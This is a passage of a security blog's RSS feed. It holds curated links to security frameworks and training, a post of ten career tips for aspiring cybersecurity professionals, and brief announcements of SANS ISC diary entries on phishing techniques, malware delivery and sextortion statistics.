&lt;li&gt;&lt;a href=&#34;https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-137A.pdf&#34;&gt;NIST Assessing Information Security Continuous Monitoring (ISCM) Programs:Developing an ISCM Program Assessment (SP 800-137A)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://csrc.nist.gov/pubs/ir/8212/final&#34;&gt;NIST ISCMA: An Information Security Continuous Monitoring Program Assessment (IR 8212)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://csrc.nist.gov/publications/detail/sp/800-37/rev-2/final&#34;&gt;NIST Risk Management Framework for Information Systems and Organizations (SP 800-37r2)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.enisa.europa.eu/publications/european-cybersecurity-skills-framework-role-profiles&#34;&gt;European Cybersecurity Skills Framework Role Profiles&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.nist.gov/itl/applied-cybersecurity/nice/nice-framework-resource-center/current-version&#34;&gt;NICE Framework Resource Center&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.ncsc.gov.uk/collection/cyber-assessment-framework&#34;&gt;NCSC Cyber Assessment Framework (CAF)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.rfc-editor.org/rfc/rfc9116&#34;&gt;RFC 9116 - A File Format to Aid in Security Vulnerability Disclosure&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Training Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://unit42.paloaltonetworks.com/wireshark-workshop-videos/&#34;&gt;Wireshark Tutorial&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://security.geant.org/training/&#34;&gt;Géant Security Training&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cybrary.it/&#34;&gt;Cybrary.it - Security Training Videos&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.isc2.org/1mcc&#34;&gt;Free ISC2 Certified in Cybersecurity Course and Certification&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Tools
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/cisagov/cset&#34;&gt;Cyber Security Evaluation Tool (CSET)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Other
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://attack.mitre.org/&#34;&gt;MITRE ATT&amp;amp;CK&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://d3fend.mitre.org/&#34;&gt;MITRE D3FEND&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://academic.oup.com/cybersecurity/article-pdf/6/1/tyaa009/33746006/tyaa009.pdf&#34;&gt;Categorizing human phishing difficulty: a PhishScale&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.hexacorn.com/blog/&#34;&gt;Hexacorn Blog&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://posts.specterops.io/bloodhound-versus-ransomware-a-defenders-guide-28147dedb73b&#34;&gt;BloodHound versus Ransomware: A Defender’s Guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://rootdse.org/posts/active-directory-basics-1/&#34;&gt;Active Directory Fundamentals&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://ioda.inetintel.cc.gatech.edu/&#34;&gt;Internet Outage Detection and Analysis (IODA)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/n0x08/ShodanTools&#34;&gt;ShodanTools - Collection of scripts &amp;amp; fingerprinting tricks for Shodan.io&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.auditscripts.com/free-resources/collective-risk-project/&#34;&gt;AuditScripts Collective Risk Project&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.enisa.europa.eu/publications/interoperable-eu-risk-management-framework&#34;&gt;ENISA - Interoperable EU Risk Management Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://cloudsecurityalliance.org/artifacts/cloud-controls-matrix-v4/&#34;&gt;Cloud Controls Matrix&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.sans.org/posters/key-metrics-cloud-enterprise-vmmm/&#34;&gt;SANS Vulnerability Management Maturity Model (VMMM)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.sans.org/blog/vmmm-self-assessment-tool/&#34;&gt;Vulnerability Management Maturity Model – Self-Assessment Tool (VMMM-SAT)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.first.org/epss/&#34;&gt;FIRST Exploit Prediction Scoring System (EPSS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://oasis-open.github.io/csaf-documentation/&#34;&gt;OASIS Common Security Advisory Framework (CSAF)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.energy.gov/ceser/cybersecurity-capability-maturity-model-c2m2&#34;&gt;Cybersecurity Capability Maturity Model (C2M2)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://inl.gov/cie/&#34;&gt;Cyber-Informed Engineering (CIE)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-50r1.pdf&#34;&gt;NIST Building a Cybersecurity and Privacy Learning Program (SP 800-50r1)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/nmantani/archiver-MOTW-support-comparison&#34;&gt;Archiver MOTW Support Comparison&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Tools</category>
            
          
        
        
          
            
              <category>CSIRT</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - How often are redirects used in phishing in 2026?</title>
        <link>https://untrustednetwork.net/en/2026/04/06/open-redirect-phishing/</link>
        <pubDate>Mon, 06 Apr 2026 10:50:00 +0100</pubDate>
        
        <atom:modified>Mon, 06 Apr 2026 10:50:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2026/04/06/open-redirect-phishing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll find out how often open redirect mechanisms were misused in phishing messages in the first quarter of 2026&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/32870&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll find out how often open redirect mechanisms were misused in phishing messages in the first quarter of 2026&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Open Redirect</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2026</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Ten tips for aspiring cybersecurity professionals</title>
        <link>https://untrustednetwork.net/en/2026/03/27/ten-tips/</link>
        <pubDate>Fri, 27 Mar 2026 10:30:00 +0100</pubDate>
        
        <atom:modified>Fri, 27 Mar 2026 10:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2026/03/27/ten-tips/</guid>
        <description>From time to time, a junior security specialist, or someone looking to break into cybersecurity, asks me for a few professional tips. The technical specifics of my recommendations naturally vary depending on the interests and plans of the individual in question. However, since I keep repeating certain general ideas and recommendations, and since I believe they may be useful to almost any junior security professional, I decided to put together a list of tips that I consider important for a meaningful, effective, and satisfying career in cybersecurity.</description>
        <content:encoded>&lt;p&gt;From time to time, a junior security specialist, or someone looking to break into cybersecurity, asks me for a few professional tips. The technical specifics of my recommendations naturally vary depending on the interests and plans of the individual in question. However, since I keep repeating certain general ideas and recommendations, and since I believe they may be useful to almost any junior security professional, I decided to put together a list of tips that I consider important for a meaningful, effective, and satisfying career in cybersecurity.&lt;/p&gt;
&lt;p&gt;Below you will find 10 recommendations (+ one extra, just to please fans of &lt;a href=&#34;https://en.wikipedia.org/wiki/Up_to_eleven&#34;&gt;Spinal Tap&lt;/a&gt;) that, looking back, I wish someone had shared with me when I was starting out. These points reflect only my personal perspective and opinions. And although I stand behind everything below, if any of it does not align with your own views, I will not hold it against you.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;b&gt;Security always depends on people, processes, and technologies, in that order. Never forget this, even if your career takes you into selling security solutions or into working in security management.&lt;/b&gt; Buying tools that no one properly operates or maintains is a great way to tick compliance checkboxes, but the real impact of a tool-centric approach to security will always be limited. Technologies alone will never deliver a meaningful level of security in any environment.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Be cautious of self-proclaimed authorities.&lt;/b&gt; Our field includes many people who genuinely deserve to be considered authorities – highly skilled professionals who are widely respected (as well as many equally capable individuals who are unfortunately not known at all outside their immediate circles). At the same time, there are also people perceived as “authorities” mainly because they present themselves that way, or because they have been around for a long time, are very vocal, or highly visible. Their actual expertise, especially in technical terms, is, however, often limited. The issue is not that they are more visible than they deserve, but that they sometimes spread outdated or even harmful ideas.&lt;br /&gt;
Be selective about who you trust. One simple test is to look at the depth of the publicly accessible work of a given authority. If their contributions consist mostly of generic statements like “we need to manage risk”, “we must increase user awareness”, or, worse, “we need to implement zero trust”, with little real substance behind them, that tells you a lot. In short, the loudest voices are not always the most qualified ones.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Do not present yourself as a “cybersecurity expert”. Ever.&lt;/b&gt; No matter how knowledgeable you think you are, and regardless of any “expert-level” certifications you may earn along the way.&lt;br /&gt;
We are not good at objectively assessing our own abilities (see the work of &lt;a href=&#34;https://en.wikipedia.org/wiki/Dunning%E2%80%93Kruger_effect&#34;&gt;Dunning and Kruger&lt;/a&gt;), and cybersecurity has grown far too broad for anyone to truly master it all. From firewall configuration and incident response to reverse engineering, quantitative risk analysis, digital forensics, red teaming, OT security, and application security architecture, no one can realistically cover the entire spectrum.&lt;br /&gt;
And don&amp;rsquo;t worry, if you ever become an expert in a specific area, others will start to label you as such on their own&amp;hellip;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Do not limit your professional development and knowledge base strictly to your specialization.&lt;/b&gt; Specializing is both natural and often necessary in cybersecurity, but every security professional worthy of that title should maintain at least a basic understanding of the broader field, since it provides essential context for their work.&lt;br /&gt;
For example, a firewall engineer should at least be aware of relevant regulatory requirements, as they may dictate where and how a firewall should/must be implemented. Similarly, a penetration tester should understand how security monitoring and SOCs work, since avoiding detection may become relevant during unannounced testing.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;If you specialize in a particular vendor’s technology, do not fall into the trap of thinking it is universally the best.&lt;/b&gt; Whether it is a Check Point firewall, Microsoft EDR/XDR platform, or anything else, no solution is objectively “the best” in all scenarios. Claiming otherwise rarely makes sense, even if you are the one selling these solutions.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;A high position does not guarantee expertise, and a low position does not mean a lack of it.&lt;/b&gt; Do not judge your colleagues solely by their titles or certifications. You will encounter highly capable people without certifications at all levels, and at the same time, people with an impressive list of certifications and titles who lack almost any practical competence.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Do not assume you understand any security domain just because you have seen it in detail in one organization.&lt;/b&gt; Even deep experience in a specific area, such as monitoring, risk management, or penetration testing, across multiple similar organizations or within the same region or sector, does not necessarily give you a full picture of how things can or should be done in general.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Your time is valuable, so be deliberate about how you spend it. If your goal is to learn, choose conferences carefully.&lt;/b&gt; Most so-called “professional” conferences are primarily marketing-driven rather than educational. Many talks are designed not to teach, but to convince you that a particular product or service is exactly what your organization needs.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;If you want to work in cybersecurity and lack even a basic level of technical knowledge, invest in building it.&lt;/b&gt; Without it, you will not be able to perform effectively in any security role.&lt;br /&gt;
This is not about gatekeeping, nor does it mean every CTI analyst, security manager, or risk specialist needs to be capable of writing exploits, hunting for zero-days or analyzing network traffic. But without understanding fundamentals like what the difference between TCP and UDP is and how this difference affects how firewalls work, what Active Directory is and why domain admin compromise matters, or how EDR/SIEM systems work and what they can realistically detect “out of the box”, none of these specialists can produce really meaningful and useful outputs.&lt;br /&gt;
The idea that “anyone can do cybersecurity”, that is often repeated these days, is only partially true. Anyone can start, but not everyone can build a sustainable, meaningful career in the field.&lt;br /&gt;
A non-technical background is not a barrier, and in some roles, such as CTI, it can even be an advantage. But without quickly building at least a basic technical foundation, it becomes very difficult to deliver real value, even in more process-oriented roles. It is hard to manage risks related to malware, or write meaningful policies about it, if terms like “malware,” “virus,” “trojan,” and “worm” are just vague, interchangeable labels, and “C2” sounds more like a chess coordinate than a command-and-control channel.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Do not believe everything you read.&lt;/b&gt; Books, courses, and certification materials, even official ones, often mix solid technical content with marketing claims and personal opinions presented as facts. You will frequently encounter half-truths or outright mistakes alongside accurate information. Being able to distinguish facts from marketing claims and outright fiction can be hard, and you will not always get it right. But at the very least, if something feels off, do not rely on a single source and cross-check it.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Be prepared for the fact that cybersecurity in any organization will have weaknesses you will not like.&lt;/b&gt; If you are not the owner or a member of executive management, your role is not to “ensure” security, but to help the organization operate as securely as possible within the constraints set by leadership. It is the management who owns all risks, including security-related ones. Your role is to help them understand and manage those risks.&lt;br /&gt;
If you identify a weakness in a process or a technology, or discover a significant threat exposure, raise them with the appropriate stakeholders. If management then decides to accept those risks without implementing the controls you&amp;rsquo;ve recommended, do not take it personally. It may not be pleasant, but the final decision always belongs to them.&lt;br /&gt;
As security professionals, we advise, guide, and do our best within the scope of our responsibilities. That is the reality of the field, even if it can sometimes be frustrating.&lt;/li&gt;
&lt;/ol&gt;
&lt;br&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/2026/03-desatero/03-ten-tips.jpg&#34; alt=&#34;Ten tips for aspiring cybersecurity professionals&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.net/images/2026/03-desatero/03-ten-tips.jpg" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Tips</category>
            
          
        
        
          
            
              <category>2026</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - A React-based phishing page with credential exfiltration via EmailJS</title>
        <link>https://untrustednetwork.net/en/2026/03/13/malicious-jpeg/</link>
        <pubDate>Fri, 13 Mar 2026 08:35:00 +0100</pubDate>
        
        <atom:modified>Fri, 13 Mar 2026 08:35:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2026/03/13/malicious-jpeg/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an interesting phishing site, which was implemented as a React single-page application&amp;hellip;.</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/32794&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an interesting phishing site, which was implemented as a React single-page application&amp;hellip;.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>React</category>
            
          
            
              <category>EmailJS</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2026</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Another day, another malicious JPEG</title>
        <link>https://untrustednetwork.net/en/2026/02/23/malicious-jpeg/</link>
        <pubDate>Mon, 23 Feb 2026 15:35:00 +0100</pubDate>
        
        <atom:modified>Mon, 23 Feb 2026 15:35:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2026/02/23/malicious-jpeg/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a recent malspam campagin delivering a multi-stage infection chain involving a JScript downloader, WMI-spawned PowerShell, and an in-memory .NET assembly extracted from a JPEG file&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/32738&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a recent malspam campagin delivering a multi-stage infection chain involving a JScript downloader, WMI-spawned PowerShell, and an in-memory .NET assembly extracted from a JPEG file&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Remcos</category>
            
          
            
              <category>Malware</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2026</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - A phishing campaign with QR codes rendered using an HTML table</title>
        <link>https://untrustednetwork.net/en/2026/01/07/qr-code-html-table/</link>
        <pubDate>Wed, 07 Jan 2026 10:35:00 +0100</pubDate>
        
        <atom:modified>Wed, 07 Jan 2026 10:35:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2026/01/07/qr-code-html-table/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a phishing campaign, in which QR codes were implemented with the help of HTML tables instead of images&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/32606&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a phishing campaign, in which QR codes were implemented with the help of HTML tables instead of images&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>QR code</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2026</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Positive trends related to public IP ranges from the year 2025</title>
        <link>https://untrustednetwork.net/en/2025/12/18/positive-trends/</link>
        <pubDate>Thu, 18 Dec 2025 09:10:00 +0100</pubDate>
        
        <atom:modified>Thu, 18 Dec 2025 09:10:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/12/18/positive-trends/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a few positive trends related to public IP ranges from the past twelve months&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/32584&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a few positive trends related to public IP ranges from the past twelve months&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>SSL</category>
            
          
            
              <category>ICS</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Use of CSS stuffing as an obfuscation technique?</title>
        <link>https://untrustednetwork.net/en/2025/11/21/css-stuffing/</link>
        <pubDate>Fri, 21 Nov 2025 10:50:00 +0100</pubDate>
        
        <atom:modified>Fri, 21 Nov 2025 10:50:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/11/21/css-stuffing/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a phishing page, which - probably as an obfusctaion technique - contained a large amount of garbage CSS code&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/32510&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a phishing page, which - probably as an obfusctaion technique - contained a large amount of garbage CSS code&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>CSS</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - A phishing with invisible characters in the subject line</title>
        <link>https://untrustednetwork.net/en/2025/10/28/invisible-subject/</link>
        <pubDate>Tue, 28 Oct 2025 10:55:00 +0100</pubDate>
        
        <atom:modified>Tue, 28 Oct 2025 10:55:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/10/28/invisible-subject/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an unusual phishing message which contained &amp;ldquo;invisible&amp;rdquo; characters in its subject line&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/32428&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an unusual phishing message which contained &amp;ldquo;invisible&amp;rdquo; characters in its subject line&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - A quick look at sextortion at scale: 1,900 messages and 205 Bitcoin addresses spanning four years</title>
        <link>https://untrustednetwork.net/en/2025/09/02/sextortion-2021-2025/</link>
        <pubDate>Tue, 02 Sep 2025 10:00:00 +0100</pubDate>
        
        <atom:modified>Tue, 02 Sep 2025 10:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/09/02/sextortion-2021-2025/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll discuss the analysis of approximately 1,900 sextortion e-mails spanning years 2021-2025, and look at interesting statistical data that resulted from this analysis&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/32252&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll discuss the analysis of approximately 1,900 sextortion e-mails spanning years 2021-2025, and look at interesting statistical data that resulted from this analysis&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Sextortion</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Do sextortion scams still work in 2025?</title>
        <link>https://untrustednetwork.net/en/2025/08/06/sextortion-2025/</link>
        <pubDate>Wed, 06 Aug 2025 11:30:00 +0100</pubDate>
        
        <atom:modified>Wed, 06 Aug 2025 11:30:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/08/06/sextortion-2025/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll discuss whether sextortion scams are still effective in 2025&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/32178&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll discuss whether sextortion scams are still effective in 2025&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Sextortion</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - How quickly do we patch? A quick look from the global viewpoint</title>
        <link>https://untrustednetwork.net/en/2025/07/21/speed-of-patching/</link>
        <pubDate>Mon, 21 Jul 2025 13:00:00 +0100</pubDate>
        
        <atom:modified>Mon, 21 Jul 2025 13:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2025/07/21/speed-of-patching/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at how quickly do we – as a global society – patch actively-exploited vulnerabilities when it comes to our internet-facing systems&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/32126&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at how quickly do we – as a global society – patch actively-exploited vulnerabilities when it comes to our internet-facing systems&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>ToolShell</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2025</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Phishing e-mail that hides malicious link from Outlook users</title>
        <link>https://untrustednetwork.net/en/2025/06/04/hidden-outlook-link/</link>
        <pubDate>Wed, 04 Jun 2025 12:30:00 +0100</pubDate>
        
